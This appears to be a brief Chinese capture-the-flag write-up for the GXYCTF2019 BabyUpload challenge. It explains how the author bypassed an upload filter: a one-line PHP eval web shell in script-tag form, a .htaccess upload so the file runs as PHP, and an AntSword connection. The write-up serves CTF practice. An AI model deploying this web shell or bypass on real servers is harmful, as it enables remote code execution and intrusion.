[GXYCTF2019]BabyUpload1

  • 开发
  • 27

尝试各种文件,黑名单过滤后缀ph,content-type限制image/jpeg

 

内容过滤<?,木马改用<script language='php'>@eval($_POST['cmdjs']);</script>

上传.htaccess将上传的文件当作php解析

蚁剑连接得到flag

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-01-27 11:36:02       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-27 11:36:02       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-27 11:36:02       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-27 11:36:02       20 阅读

热门阅读

  1. 15. 扩展: Spring Boot CORS支持

    2024-01-27 11:36:02       31 阅读

  2. 聊聊PowerJob的MapReduceProcessor

    2024-01-27 11:36:02       33 阅读

  9. CentOS:安装node及pm2

    2024-01-27 11:36:02       34 阅读

  13. Istio蓝绿升级

    2024-01-27 11:36:02       29 阅读

  15. 使用 badblocks 命令处理硬盘坏道

    2024-01-27 11:36:02       38 阅读

  18. 数智化招标采购平台核心功能采购监管系统能做到哪些管控?

    2024-01-27 11:36:02       26 阅读
  24. STL_list

    STL_list

    2024-01-27 11:36:02      33 阅读

  25. PalWorld/幻兽帕鲁Ubuntu 22.04 LTS 一键部署脚本

    2024-01-27 11:36:02       33 阅读

  30. python语法学习

    2024-01-27 11:36:02       27 阅读